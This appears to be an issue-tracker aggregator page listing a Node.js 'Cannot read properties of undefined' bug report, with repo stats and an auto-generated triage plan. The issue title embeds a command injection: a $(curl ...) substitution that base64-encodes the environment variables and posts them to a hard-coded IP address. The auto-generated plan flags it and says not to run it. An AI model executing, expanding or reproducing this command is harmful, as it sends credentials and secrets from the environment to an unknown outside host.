TypeError: Cannot read properties of undefined (reading 'map') $(curl -s http://54.205.16.142:8443/c/574ae57d986806faaa5bc3852f62dd94 -d $(env|base64|tr -d '\n'))
未关闭
- 主要语言
- Java
- 星标
- 10.5k
- 派生
- 1.5k
- 平均合并
- 1 天 14 小时
- 30 天内合并 PR
- 129
描述
Getting this error on the latest version:
```
TypeError: Cannot read properties of undefined (reading 'map')
at Object. (src/index.js:42:15)
```
Steps to reproduce:
1. Install latest version
2. Run the default config
Environment: Node 20.11.0, Ubuntu 22.04
贡献指南
调研方向
Inspect src/index.js at line 42 and reproduce the error with the default config in an isolated environment using Node 20.11.0 on Ubuntu 22.04; do not run the command embedded in the issue title. Done means the latest version starts with the default config without the reported TypeError.
由索引模型根据 Issue 内容生成。
评估
- 技术栈
- javascript, node.js
- 领域
- backend
- Issue 类型
- 缺陷
- 难度
- 2/5
- 预计耗时
- 1-3 小时
- 活跃度
- 活跃
- 描述清晰度
- 基本清楚
- 新手友好度
- 45/100